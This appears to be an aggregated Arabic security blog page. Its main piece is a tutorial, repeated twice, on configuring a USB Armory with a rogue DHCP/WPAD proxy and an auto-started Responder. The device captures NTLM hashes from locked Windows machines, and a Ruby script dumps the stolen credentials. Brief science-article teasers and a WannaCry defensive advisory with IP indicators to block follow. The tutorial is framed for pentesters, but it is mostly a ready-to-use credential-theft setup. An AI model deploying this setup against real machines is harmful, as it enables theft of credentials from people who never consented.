dd if=usbarmory-debian_jessie-base_image-20170518.raw of=/dev/sdc bs=1M conv=fsync
تستغرق هذه العملية لتكتمل ما بين 3 إلى 4 دقائق. لاحظ أننا استخدمنا /dev/sdc وليس /dev/sdc1
الأن أخرج ال microSD card من جهازك وركبه في الـ USB armory. أنصحك بالتعامل مع ال USB armory برفق لأن أجزاءه حساسة وخفيفة جدا.
وصل ال USB armory في جهازك في أي منفذ من منافذ ال USB الخاصة بكمبيوترك وانتظر 20 ثانية حتى يعمل نظام التشغيل بشكل كامل. ستلاحظ خلالها أنها تنير وتنطفئ بشكل مستمر. بعد انتظارك نفذ الأمر
ifconfig
سترى كرت شبكة جديد يأخذ IP محدد تلقائيا وهو 10.0.0.2
الخطوة الثانية:/ إعداد نظام التشغيل
الآن ادخل إلى الجهاز عن طريق ال SSH على العنوان 10.0.0.1 وهذه العناوين ستكون ثابته دائما
ssh usbarmory@10.0.0.1
كلمة المرور الافتراضية هي: usbarmory
نبدأ إعداد النظام
1. تحديث المخازن والنظام
المخازن الافتراضية التي تأتي مع التوزيع ليست كافية وبها إصدارات قديمة وبرامج أقل لهذا سنقوم بعمل تحديث مرتين. مرة بالمخازن الافتراضية والثانية بالمخازن التي نريدها
تكأد أنك تصل إلى الانترنت من ال USB Armory ثم ابد بالتحديث
apt update && apt upgrade
ثبت البرامج التالية
apt install wget apt-transport-https dirmngr
الأن اذهب إلى الموقع التالي http://ift.tt/2lClzXK ثم اختر Stable واضغط Generate. سيظهر لك المخازن المطلوبة. نسخها في المسار /etc/apt/sources.list
ضع علامة # أمام المخازن القديمة لتجاهلها.
الأن نفذ الأمر التالي مرة أخرى
apt update && apt upgrade
2. تثبيت البرامج المطلوبة
ثبت البرامج التالية
apt -y curl git screen sqlite3 build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev autoconf postgresql pgadmin3 zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev inotify-tools
apt install -y ruby ruby-dev
gem install sqlite3
apt install -y python python-pip python-dev
pip install pycrypto
3. إعداد ال DHCPd
خذ نسخة احتياطية من الملف
cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.orig
واجعل محتويات الملف الأصلي كالتالي
# # Sample configuration file for ISC dhcpd for Debian # # have support for DDNS. ddns-update-style none; # option definitions common to all supported networks... option domain-name "attacker.zone"; option domain-name-servers 10.0.0.1; default-lease-time 600; max-lease-time 7200; # If this DHCP server is the official DHCP server for the local # network, the authoritative directive should be uncommented. authoritative; # Use this to send dhcp log messages to a different log file (you also # have to hack syslog.conf to complete the redirection). log-facility local7; # wpad - Web Proxy Auto-Discovery Protocol option local-proxy-config code 252 = text; # A slightly different configuration for an internal subnet. subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.2 10.0.0.3; default-lease-time 60; max-lease-time 72; option routers 10.0.0.1; option local-proxy-config "http://ift.tt/1CLNTNL"; }
4. تحميل برنامج Responder
برنامج Responder هو واحد من أشهر البرامج حاليا في عمل خادم وهمي للكثير من الخدمات مثل HTTP/SMB/MSSQL/FTP/LDAP والتي تفيد في حقن الاتصال داخل الشبكة ويستخدم كثيرا في هجمات ال MiTM.
mkdir /pentest && cd /pentest
git clone http://ift.tt/2cjz0s2
chmod +x Responder.py
لاحظ في في إعدادات ال dhcp server أضفنا تحت WPAD أو Web Proxy Auto-Discovery Protocol وهو رابط إعدادات البروكسي والتي سيجبر فيه الجهاز المستخدم أن يذهب إلى هذا الرابط ويحملها ليقوم باكتشاف البروكس (بروكسي وهمي عن طريق برنامج Responder) قبل تصفحه أي موقع.
تشغيل البرامج تلقائيا عند بدء النظام
كل ما نريده هنا أن نجعل ال USB armory أن تشغل تلقائيا ال DHCP وبرنامج Responder بمجرد أنا يعمل النظام.
#!/bin/sh -e # # rc.local # # This script is executed at the end of each multiuser runlevel. # Make sure that the script will "exit 0" on success or any other # value on error. # # In order to enable or disable this script just change the execution # bits. # # By default this script does nothing. # Generate ssh host keys if missing FILES=$(ls /etc/ssh/ssh_host_* 2> /dev/null | wc -l) if [ "$FILES" = "0" ]; then while [ $(cat /proc/sys/kernel/random/entropy_avail) -lt 256 ]; do sleep 1; done /usr/sbin/dpkg-reconfigure openssh-server fi # Start DHCP server if ! pgrep -x "dhcpd" > /dev/null then echo "Starting DHCPd" >> /root/rc.log echo '' > /var/lib/dhcp/dhcpd.leases /usr/sbin/dhcpd fi # Start Responder echo "Staring Responder" >> /root/rc.log /usr/bin/screen -dmS responder bash -c 'cd /pentest/responder/; python Responder.py -I usb0 -f -w -r -d -F' echo "Staring cred watch" >> /root/rc.log /usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/responder/Responder.db; do shutdown -h now; done' exit 0
الخطوة:الثالثة:/ تنفيذ الهجوم واستعادة البيانات والاستفادة منها(اختراق الجهاز المستخدم)
الأن لم يبقى سوى توصيل USB Armory في الجهاز المستهدف والانتظار حتى يعمي ثم تنطفئ الإنارة تماما.
بعد اكتمال الهجوم وأخذ جهازنا, نستطيع أن نوصل ال USB Armory في الكومبيوتر الخاص بنا والحصول على الهاشات والصلاحيات التي تم جمعها
يتم تخزين الصلاحيات في مكانين
أولها قاعدة بيانات
/pentest/responder/Responder.db
ثانيها
/pentest/responder/logs/(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt
وأفضل الملف الأول Responder.db لأنه يخزن جميع أنواع البيانات المسروقة ولا يحتاج منك البحث في أكثر من ملف مثل المسار الثاني.
قمت بعمل سكريبت صغير يقرأ قاعدة البيانات بشكل مرتب و سهل
#!/usr/bin/env ruby # KING SABRI | @KINGSABRI # Responder database reader # require "sqlite3" if ARGV.size == 1 responder_db = ARGV[0] else puts "Respnder.db path required!\nUsage: ruby responder-reader.rb /path/responder/Responder.db" exit end # Open db = SQLite3::Database.new responder_db records = db.execute "SELECT * FROM responder;" records.each do |record| puts "Timestamp: #{record[0]}" puts "Module: #{record[1]}" puts "HashType: #{record[2]}" puts "IPaddress: #{record[3]}" puts "Hostname: #{record[5].split('\\')[0]}" puts "Username: #{record[5].split('\\')[1]}" puts "Cleartext: #{record[6]}" puts "Hash: #{record[7]}" puts "Full Hash: #{record[8]}" puts end puts "[+] Number of records: #{records.size}"
ويستخدم بهذه الطريقة
ruby responder-reader.rb /pentest/responder/Responder.db
النتيجة
Timestamp: 2017-06-21 06:23:10
Module: HTTP
HashType: NTLMv2
IPaddress: 10.0.0.2
Hostname: DESKTOP-9INJ6LJ
Username: KING
Cleartext:
Hash: 8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Full Hash: KING::DESKTOP-9INJ6LJ:1122334455667788:8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
[+] Number of records: 1
فيديو يوضح نتيجة الهجوم
بالإضافة إلى ما تم ذكره من سرقة ال NTLM hashes والجهاز وسطح المكتب مغلق, سيعمل الهجوب على إنشاء بروكسي وهمي (تذكر إعدادت ال DHCP و WPAD) ويجبر النظام على استخدامه فلو دخل المستخدم إلي جهازه وحاول تصفح الأنترنت ستظهر له شاشة تطلب إدخال اسم المستخدم كلمة المرور (غالبا ما سيدخل المستخدم كلمة المستخدم وكلمة المرور) وستخزن أيضا في قاعدة البيانات على شكل NTLM.
في النهاية أحب أن أنوه على أن استخدامات الـ USB Armory لا تنحصر في ما تطرقنا إليه فقط.
المصادر
- الموقع الرسمي
- الويكي الرسمية
- إعداد الهجوم Snagging creds from locked machines
- تلخيص متجدد لكل ما أعمله على USB Armory
- المخزن الرسمي لبرنامج Responder
by صبري صالح via مجتمع الحماية العربي
سرقة الصلاحيات من جهاز ويندوز مغلق باستخدام USB Armory
USB Armory
موضوعنا اليوم هو موضوع جميل ومهم جدا لل pentester و ال red teamer ويصنف تحت ال Physical Social Engineering Attack. اليوم سنتعلم كيفية سرقة ال NTLM hashes من جهاز ويندوز حتى لو كان الجهاز في Locked باستخدام USB Armory device.
نستفيد من هاشات ال NTLM في سيناريوهات كثيرة منها على سبيل الذكر لا الحصر
- الدخول على ال Shared folders
- أو في هجمات ال PTH على الجهاز أو على الخوادم التي قد يدخلها المستخدم من جهازه المستهدف
- تنفيذ أوامر عن بعد على الجهاز المستهدف باستخدام psexec
- محاول كسر الهاش و الحصول على كلمة المرور الحقيقة باستخدام أداة hashcat (قد تستغرق وقت طويل جدا)
- إلخ
الجدير بالذكر هنا أنه لن تعيقنا أي Group policy تمنع استخدام ال USB storage لان الكمبوتر المستهدف سيتعرف عليه على أنه USB Ethernet device.
ما هو جهاز USB Armory ؟
ببساطة, هو عبارة عن جهاز كومبيوتر بحجم Flash drive. تستطيع أن تثبت عليه نظام تشغيل وتتعامل معه بكامل خصائص نظام التشغيل. مكونات USB Armory المادية أو ال Hardware مفتوحة المصدر, بمعنى أنك تستطيع أن تطلع على تفاصيل تصميم الجهاز والتغيير في مكوناته كما تشاء.
قامت شركة InversePath والتي تم الاستحواذ عليها من شركة F-Secure والمتخصصة في عمل أجهزة بنية تحتية آمنة.
سعر الجهاز هو 155 دولار أمريكي
يحتوي جهاز USB armory على microSDcard كوحدة تخزين وهنا قائمة بال microSD cards المدعومة رسمية ولكنها لا تنحصر في هذه القائمة. فكل ال microSDcard الحديثة مدعومة ولكن يفضل أن تكون ذات سرعة عالية في القراءة والكتابة. أشهر الأنواع المدعومة والمتوفرة في جميع الدول العربية هي SanDisk لكن بشرط أن تكون Ultra. وحدة التخزين هذه هي التي تحتوي على نظام التشغيل والذي سنغطي اليوم طريقة تحميل و تثبيت و إعداد النظام عليها.
الخطوة الأولى:/ تحميل نظام التشغيل وتثبيته
في البداية نذهب إلى صفحة انظمة التشغيل المدعومة رسميا من هنا. كما أحبذ أن نستخدم نسخة USB armory base images. قد يستغرب عدم اختيارالنسخة ال Kali لكن بعد بحث وجدت أن نسخة الكالي يشتكي بعض الناس منها ووجود بعض ال Bugs في منصة ARM لهذا. كما أن النسخة التي اخترتها هي نفس ما تستخدمه الكالي تماما ولا شي مختلف على الإطلاق بل بالعكس تأتي النسخة مجردة تماما من جميع البرامج مما يجعلها صغيرة الحجم وسريعة.
الأن نذهب إلى الرابط تحميل النظام ونحمل أخر image موجودة. حاليا النسخة (usbarmory-debian_jessie-base_image-20170518.raw.zip) هي الأحدث حتى تاريخ كتابة هذا المقال.
1. تحميل النظام
wget -c http://ift.tt/2s9nwwD
نتأكد من أن أننا حملنا النسخة بشكل سليم
sha256sum usbarmory-debian_jessie-base_image-20170518.raw.zip
يجب أن تكون المخرجات كما في الصفحة التحميل الرسمية.
نفك ضغط النظام
unzip usbarmory-debian_jessie-base_image-20170518.raw.zip
ينتج عنه ملف
usbarmory-debian_jessie-base_image-20170518.raw
2. معرفة مكان أو تسمية ال microSD card في الجهاز
الآن دخل ال micro SD card في جهازك, جهاز الكمبيوتر الخاص بك وليس ال USB armory. ثم اعرض جميع وحدات التخزين الموجودة في جهازك
fdisk -l
في حالة جهازي كان تسمية ال SD cards هي /dev/sdc وقد تخلف التسمية عنده. كن حذر جدا هنا لأن في مرحلة الثبيت لو اخترت وحدة تخزين خاطئة ستقوم بمسح كل ما على تلك وحدة ووضع نظام التشغيل عليها! لهذا وجب التنبيه
3. تثبيت النظام على ال microSD card
بصلاحيات ال root نفذ الأمر التالي: (انبته لمسار وحدة التخزين هنا)
dd if=usbarmory-debian_jessie-base_image-20170518.raw of=/dev/sdc bs=1M conv=fsync
تستغرق هذه العملية لتكتمل ما بين 3 إلى 4 دقائق. لاحظ أننا استخدمنا /dev/sdc وليس /dev/sdc1
الأن أخرج ال microSD card من جهازك وركبه في الـ USB armory. أنصحك بالتعامل مع ال USB armory برفق لأن أجزاءه حساسة وخفيفة جدا.
وصل ال USB armory في جهازك في أي منفذ من منافذ ال USB الخاصة بكمبيوترك وانتظر 20 ثانية حتى يعمل نظام التشغيل بشكل كامل. ستلاحظ خلالها أنها تنير وتنطفئ بشكل مستمر. بعد انتظارك نفذ الأمر
ifconfig
سترى كرت شبكة جديد يأخذ IP محدد تلقائيا وهو 10.0.0.2
الخطوة الثانية:/ إعداد نظام التشغيل
الآن ادخل إلى الجهاز عن طريق ال SSH على العنوان 10.0.0.1 وهذه العناوين ستكون ثابته دائما
ssh usbarmory@10.0.0.1
كلمة المرور الافتراضية هي: usbarmory
نبدأ إعداد النظام
1. تحديث المخازن والنظام
المخازن الافتراضية التي تأتي مع التوزيع ليست كافية وبها إصدارات قديمة وبرامج أقل لهذا سنقوم بعمل تحديث مرتين. مرة بالمخازن الافتراضية والثانية بالمخازن التي نريدها
تكأد أنك تصل إلى الانترنت من ال USB Armory ثم ابد بالتحديث
apt update && apt upgrade
ثبت البرامج التالية
apt install wget apt-transport-https dirmngr
الأن اذهب إلى الموقع التالي http://ift.tt/2lClzXK ثم اختر Stable واضغط Generate. سيظهر لك المخازن المطلوبة. نسخها في المسار /etc/apt/sources.list
ضع علامة # أمام المخازن القديمة لتجاهلها.
الأن نفذ الأمر التالي مرة أخرى
apt update && apt upgrade
2. تثبيت البرامج المطلوبة
ثبت البرامج التالية
apt -y curl git screen sqlite3 build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev autoconf postgresql pgadmin3 zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev inotify-tools
apt install -y ruby ruby-dev
gem install sqlite3
apt install -y python python-pip python-dev
pip install pycrypto
3. إعداد ال DHCPd
خذ نسخة احتياطية من الملف
cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.orig
واجعل محتويات الملف الأصلي كالتالي
# # Sample configuration file for ISC dhcpd for Debian # # have support for DDNS. ddns-update-style none; # option definitions common to all supported networks... option domain-name "attacker.zone"; option domain-name-servers 10.0.0.1; default-lease-time 600; max-lease-time 7200; # If this DHCP server is the official DHCP server for the local # network, the authoritative directive should be uncommented. authoritative; # Use this to send dhcp log messages to a different log file (you also # have to hack syslog.conf to complete the redirection). log-facility local7; # wpad - Web Proxy Auto-Discovery Protocol option local-proxy-config code 252 = text; # A slightly different configuration for an internal subnet. subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.2 10.0.0.3; default-lease-time 60; max-lease-time 72; option routers 10.0.0.1; option local-proxy-config "http://ift.tt/1CLNTNL"; }
4. تحميل برنامج Responder
برنامج Responder هو واحد من أشهر البرامج حاليا في عمل خادم وهمي للكثير من الخدمات مثل HTTP/SMB/MSSQL/FTP/LDAP والتي تفيد في حقن الاتصال داخل الشبكة ويستخدم كثيرا في هجمات ال MiTM.
mkdir /pentest && cd /pentest
git clone http://ift.tt/2cjz0s2
chmod +x Responder.py
لاحظ في في إعدادات ال dhcp server أضفنا تحت WPAD أو Web Proxy Auto-Discovery Protocol وهو رابط إعدادات البروكسي والتي سيجبر فيه الجهاز المستخدم أن يذهب إلى هذا الرابط ويحملها ليقوم باكتشاف البروكس (بروكسي وهمي عن طريق برنامج Responder) قبل تصفحه أي موقع.
تشغيل البرامج تلقائيا عند بدء النظام
كل ما نريده هنا أن نجعل ال USB armory أن تشغل تلقائيا ال DHCP وبرنامج Responder بمجرد أنا يعمل النظام.
#!/bin/sh -e # # rc.local # # This script is executed at the end of each multiuser runlevel. # Make sure that the script will "exit 0" on success or any other # value on error. # # In order to enable or disable this script just change the execution # bits. # # By default this script does nothing. # Generate ssh host keys if missing FILES=$(ls /etc/ssh/ssh_host_* 2> /dev/null | wc -l) if [ "$FILES" = "0" ]; then while [ $(cat /proc/sys/kernel/random/entropy_avail) -lt 256 ]; do sleep 1; done /usr/sbin/dpkg-reconfigure openssh-server fi # Start DHCP server if ! pgrep -x "dhcpd" > /dev/null then echo "Starting DHCPd" >> /root/rc.log echo '' > /var/lib/dhcp/dhcpd.leases /usr/sbin/dhcpd fi # Start Responder echo "Staring Responder" >> /root/rc.log /usr/bin/screen -dmS responder bash -c 'cd /pentest/responder/; python Responder.py -I usb0 -f -w -r -d -F' echo "Staring cred watch" >> /root/rc.log /usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/responder/Responder.db; do shutdown -h now; done' exit 0
الخطوة:الثالثة:/ تنفيذ الهجوم واستعادة البيانات والاستفادة منها(اختراق الجهاز المستخدم)
الأن لم يبقى سوى توصيل USB Armory في الجهاز المستهدف والانتظار حتى يعمي ثم تنطفئ الإنارة تماما.
بعد اكتمال الهجوم وأخذ جهازنا, نستطيع أن نوصل ال USB Armory في الكومبيوتر الخاص بنا والحصول على الهاشات والصلاحيات التي تم جمعها
يتم تخزين الصلاحيات في مكانين
أولها قاعدة بيانات
/pentest/responder/Responder.db
ثانيها
/pentest/responder/logs/(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt
وأفضل الملف الأول Responder.db لأنه يخزن جميع أنواع البيانات المسروقة ولا يحتاج منك البحث في أكثر من ملف مثل المسار الثاني.
قمت بعمل سكريبت صغير يقرأ قاعدة البيانات بشكل مرتب و سهل
#!/usr/bin/env ruby # KING SABRI | @KINGSABRI # Responder database reader # require "sqlite3" if ARGV.size == 1 responder_db = ARGV[0] else puts "Respnder.db path required!\nUsage: ruby responder-reader.rb /path/responder/Responder.db" exit end # Open db = SQLite3::Database.new responder_db records = db.execute "SELECT * FROM responder;" records.each do |record| puts "Timestamp: #{record[0]}" puts "Module: #{record[1]}" puts "HashType: #{record[2]}" puts "IPaddress: #{record[3]}" puts "Hostname: #{record[5].split('\\')[0]}" puts "Username: #{record[5].split('\\')[1]}" puts "Cleartext: #{record[6]}" puts "Hash: #{record[7]}" puts "Full Hash: #{record[8]}" puts end puts "[+] Number of records: #{records.size}"
ويستخدم بهذه الطريقة
ruby responder-reader.rb /pentest/responder/Responder.db
النتيجة
Timestamp: 2017-06-21 06:23:10
Module: HTTP
HashType: NTLMv2
IPaddress: 10.0.0.2
Hostname: DESKTOP-9INJ6LJ
Username: KING
Cleartext:
Hash: 8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Full Hash: KING::DESKTOP-9INJ6LJ:1122334455667788:8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
[+] Number of records: 1
فيديو يوضح نتيجة الهجوم
بالإضافة إلى ما تم ذكره من سرقة ال NTLM hashes والجهاز وسطح المكتب مغلق, سيعمل الهجوب على إنشاء بروكسي وهمي (تذكر إعدادت ال DHCP و WPAD) ويجبر النظام على استخدامه فلو دخل المستخدم إلي جهازه وحاول تصفح الأنترنت ستظهر له شاشة تطلب إدخال اسم المستخدم كلمة المرور (غالبا ما سيدخل المستخدم كلمة المستخدم وكلمة المرور) وستخزن أيضا في قاعدة البيانات على شكل NTLM.
في النهاية أحب أن أنوه على أن استخدامات الـ USB Armory لا تنحصر في ما تطرقنا إليه فقط.
المصادر
- الموقع الرسمي
- الويكي الرسمية
- إعداد الهجوم Snagging creds from locked machines
- تلخيص متجدد لكل ما أعمله على USB Armory
- المخزن الرسمي لبرنامج Responder
by صبري صالح via مجتمع الحماية العربي
الأحد، 18 يونيو 2017
الثلاثاء، 13 يونيو 2017
POZZOLANIC CEMENT IN QASEEM FACTORIES
تعد مادة الاسمنت مادة أساسية في مرحلة البناء هذه الفترة من الزمن ومن أخطرها. إذ ينتج 30 ألف طن من الكربون كل دقيقة إنتاج كُنّا قد نشرنا مسبقا مقالا عن الاسمنت الأخضر كبديل لتلوث جنوب مدينة الرياض . وها هنا ننشرُ بحثًا أخر يتناول فيه الاسمنت البوزلاني الموجود في مصنع مدينة القصيم التابعة لمحافظة الرياض […]
The post POZZOLANIC CEMENT IN QASEEM FACTORIES appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
الأكوان المتعددة وأوهام سبق أن رأيتها
“ الديجافو“ هي الشعور بأوهام قد رأيتها من قبل بمكان ما او بغرفتك او انك تمر بموقف و تسأل نفسك لقد مررت بهذا من قبل؟ أي أن كل شيء مألوف لك وكأنك تعرفه !! أكتشف العلماء أننا نستطيع – في الواقع– أن نحث شعور “ الدبجافو“ من خلال التجارب. وبهذا الصدد نشأت نظرية تقول “ […]
The post الأكوان المتعددة وأوهام سبق أن رأيتها appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
الخميس، 1 يونيو 2017
الاثنين، 29 مايو 2017
الأربعاء، 24 مايو 2017
وفقاً للعلم، 7 حقائق مثيرة للدهشة عن الإبداع الإنساني
هناك العديد من الأشياء التي يبدو بأنها تستحضر الإبداع، من أحلام اليقظة ولخيال إلى التجوال دون هدف، حتى الأحداث السلبية، كصدمة فقدان شيء ما، يمكن أن يكون لها أثراً إيجابياً على الإبداع، وفي الواقع، كلما تعمقنا في عمل الجانب الإبداعي من عقولنا، كان هناك المزيد من المفاجآت التي يمكن أن نكتشفها. على الرغم من أن […]
The post وفقاً للعلم، 7 حقائق مثيرة للدهشة عن الإبداع الإنساني appeared first on مجلة نقطة العلمية.
by Diana via مجلة نقطة العلمية
السبت، 20 مايو 2017
زراعة مبايض صناعية .. أصبحت أقرب للواقع
أبوظبي – سكاي نيوز عربية نجحت دراسة في زراعة مبايض صناعية في فئران، ما يبشر بحدوث الأمر ذاته للنساء اللاتي أصبن العقم نتيجة نتيجة السرطان أو غيره وأفاد باحثون بنجاح تجربة زرع مبايض، جرى تطويرها داخل هياكل طبعت بنظام ثلاثي الأبعاد، داخل فئران عقمها الباحثون لكنها تمكنت من التكاثر بعد التجربة، وفق ما أوردت وكالة […]
The post زراعة مبايض صناعية .. أصبحت أقرب للواقع appeared first on مجلة نقطة العلمية.
by نقطة via مجلة نقطة العلمية
الجمعة، 19 مايو 2017
اكتشاف فلكي يعزز فرضية الأكوان الموازية
أبوظبي – سكاي نيوز عربية انشغل علماء الفلك، منذ أمد طويل، بتفسير بقعة غامضة ومظلمة في الكون، لكن الفرضية التي برزت بقوة مؤخرا ترجح أن تكون تلك البؤرة المتبقية من الانفجار العظيم، عبارة عن كون مواز للكون الذي توجد فيه مجموعتنا الشمسية. وبحسب ما نقلت صحيفة “إندبندنت” البريطانية، فإن البقعة الباردة قد تكون مزيجا من […]
The post اكتشاف فلكي يعزز فرضية الأكوان الموازية appeared first on مجلة نقطة العلمية.
by aaouir via مجلة نقطة العلمية
الخميس، 18 مايو 2017
زهرة اللوتس بين الاسطورة والواقع
زهرة اللوتس Nymphae Sp Lotus زهرة اللوتس كان لها دور كبير في طقوس العبادة المصرية القديمة وكانت تعتبر من أقدس الأزهار، وأعظم الأزهار كمالاً، إنها سيدة العطور, حيث كانت زنابق النيل المقدسة تقدم كقرابين خلال الشعائر الجنائزية, كما وجدت بقاياها تغطي جسد توت عتخ امون عند اكتشاف مقبرته عام 1922, وقد سمى اللوتس المصري بزنابق النيل، […]
The post زهرة اللوتس بين الاسطورة والواقع appeared first on مجلة نقطة العلمية.
by د. وليد فؤاد ابوبطة via مجلة نقطة العلمية
الثلاثاء، 16 مايو 2017
الفوائد الصحية لتناول البيض
يعتبر كل من بياض البيض وصفاره غنيان بالمواد المغذية، حيث يحتوي صفار البيض على 90% من الكالسيوم والحديد الذي يوجد في البيض، مما يجعله صحياً للغاية، في حين يحتوي البياض على البروتين الطبيعي، الذي هو يعتبر مادة هامة للجسم، وإلى جانب ذلك، فإن البيض عنصر هام للطهي، فتركيبته الكيميائية تجعله حرفياً بمثابة الغراء للعديد من […]
The post الفوائد الصحية لتناول البيض appeared first on مجلة نقطة العلمية.
by Diana via مجلة نقطة العلمية
الجمعة، 12 مايو 2017
فيروس الفدية WannaCry وكيف تنقذ مؤسستك منه قبل فوات الأوان.
السلام عليكم إخواني الكرام,
انتشر وبشدة فيروس WannaCry منذ البارحه كالنار في الهشيم وأصاب اكثر من 40000 الف جهاز كمبيوتر في حوالي 74 دولة حول العالم ما بين مؤسسات حكومية و ما يقرب من 16 مستشفي في إنجلترا ومن المؤسف تعليق أحد الدكاترة بأحد المستشفيات التي اصيبت انظمتها بهذا الفيروس علي موقع الجارديان قائلا بأن جميع العمليات توقفت في المستشفي منذ الواحده مساء وتم حذف جميع سجلات المرضي ونتائج الفحص وأن حياة أشخاص كثيرون علي المحك بسب هذه الكارثه وبالتأكيد سيكون هناك موتي جراء إنتشار هذا الفيروس!!!
مرورا بأكبر شركة اتصالات في إسبانيا وغيرها من الأهداف التي اصيبت بهذا الفيروس حتي ان وزارة الداخلية الروسية لم تسلم. لذا قررنا علي وجه السرعة كتابة مقال يتلخص في جزأين. ما اللذي نعرفه عن الفيروس وماذا يتوجب عليك فعله لتحمي مؤسستك او شركتك التي تعمل بها قبل فوات الأوان.
ما اللذي نعرفه عن الفيروس حتي الآن:
1- الفيروس مثله كمثل اي فيروس فديه أخر يقوم بتشفير ملفات جهازك ويطلب منك مبلغ 300 دولار حتي يمكنك استرجاع ملفاتك مره اخري
2- هذا الفيروس يقوم بالإنتشار من خلال رسائل تصيد Phishing EMails يتم ارسالها لملايين الإميلات بشكل عشوائي ويحتوي الإميل المرسل علي ملف مرفق عندما يتم فتحه يقوم بتنزل فيروس الفديةWannaCry
3- من الطرق التي يستخدمها الفيروس أيضا هي عملية الفحص العشوائي للعناوين IP Addresses فيقوم بانشاء ايبي عشوائي ومن ثم فحص اذا ما كان port 445 مفتوح علي هذا الايبي ام لا وهو البورت المستخدم بواسطة خدمة مشاركة الملفات SMB فاذا وجد ايبي مفتوح فيه هذا البورت يقوم بفحص جميع الايبيهات التي علي نفس الشبكه ويحاول استغلال ثغرة MS17-010 عليهم جميعا.
4- بعد ان يقوم الفيروس بالنزول علي جهاز الضحيه واصابته يقوم مباشرة بفحص كل الايبيهات الموجوده علي الشبكه باحثا عن اي جهاز يستخدم port 445 الخاص بخدمة مشاركة الملفات SMB Service
5- اذا وجد اي جهاز علي الشبكه يستخدم خدمة مشاركة الملفات فانه يقوم بإستغلال الثغرة الخطيرة التي تم الاعلان عنها عقب تسريبها من فريق الأمن القومي الأمريكي NSA بواسطة فريق ShadowBrokers والثغره معروفه باسم MS17-010 وهي ثغره تصيب كل أنظمة الوندوز وتمكن المخترق من إختراق اي جهاز تعمل عليه خدمة مشاركة الملفات SMB
6- ولان خدمة مشاركة الملفات منتشره في كل الشركات وحتي اغلب الشبكات الخاصه فبهذه الطريقه انتشر الفيروس كالنار في الهشيم في اكثر من اربعه وسبعين دوله حول العالم في وقت قياسي
7- من بين الدول المصابه بالفيروس هي ألمانيا, روسيا, إنجلترا, أسبانيا, أمريكا, الأرجنتين وغيرها من الدول العربية أيضا التي لم تسلم من ذلك الفيروس
8- وللاسف تم الإبلاغ عن انتشار موسع للفيروس داخل 16 مستشفي في إنجلترا وتعطل انظمة تلك المستشفيات بسبب أن الفيروس قام بتشفير سجلات المرضي ولا يمكنهم استقبال اي حالات جديدة
ما اللذي يتوجب عليك فعله:
١- قم فوراا بعمل تحديث لجميع أنظمة الوندوز داخل شركتك لتتأكد من ترقيع ثغرة MS17-010 والتي هي السبب الرئيسي في عملية الإختراق وانتشار الفيروس
اذا كان لاي سبب لديك مشكله في تحديث الوندوز فيمكنك استخدام تلك الأداه التي نشرتها شركة Symantec وتشغيلها بصلاحية administrator علي جهازك وسيقوم بعدها جهازك بإعادة التشغيل وتكون الثغره قد تم ترقيعها في جهازك
اما للشركات والبنوك وغيرها من المؤسسات فننصح بشده بعمل تحديث لجميع اجهزة وسرفرات الشركة مباشرة.
٢- تأكد من أن جميع أجهزة شركتك منصب عليها برنامج مضاد فيروسات وعليه جميع التحديثات لتضمن بأن بيانات هذا الفيروس file signatures موجوده في مضاد الفيروسات الخاص بك ليقوم بايقاف اي محاوله من الفيروس الدخول الي اجهزة الشركه
٣- اذا كان لدي شركتك اي سرفرات متصلة بالانترنت فتأكد من ان port 445 و port 139 لا يمكن الوصول اليهم من خارج شكبتك او من خلال الانترنت بصورة عامة
٤- المخترقين يقومون باستخدام الايبيهات التاليه للتحكم في الفيروس او في الاجهزه المخترقه لذا ننصح وبشدة أن تقوم بالبحث داخل ال SIEM Solution الخاص بشركتك عن اي سجلات logs لها علاقه بهذه الايبيهات واذا لم يكن لدي شركتك SIEM Solution فيمكنك البحث في السجلات الخاصه بال Proxy او DNS Logs
الخاصه بشركتك عن تلك الايبيهات للتأكد من ان أجهزة شركتك لم يصيبها هذا الفيروس
213.61.66.116
171.25.193.9
163.172.35.247
128.31.0.39
185.97.32.18
178.62.173.203
136.243.176.148
217.172.190.251
94.23.173.93
50.7.151.47
83.162.202.182
163.172.185.132
163.172.153.12
62.138.7.231
188.166.23.127
193.23.244.244
2.3.69.209
146.0.32.144
50.7.161.218
217.79.179.77
212.47.232.237
81.30.158.223
79.172.193.32
89.45.235.21
38.229.72.16
188.138.33.220
كما ننصح أيضا بإضافة هذه القائمة من الأيبيهات الي ال IPS الخاص بشركتك او وضعهم علي قائمة الحظر.
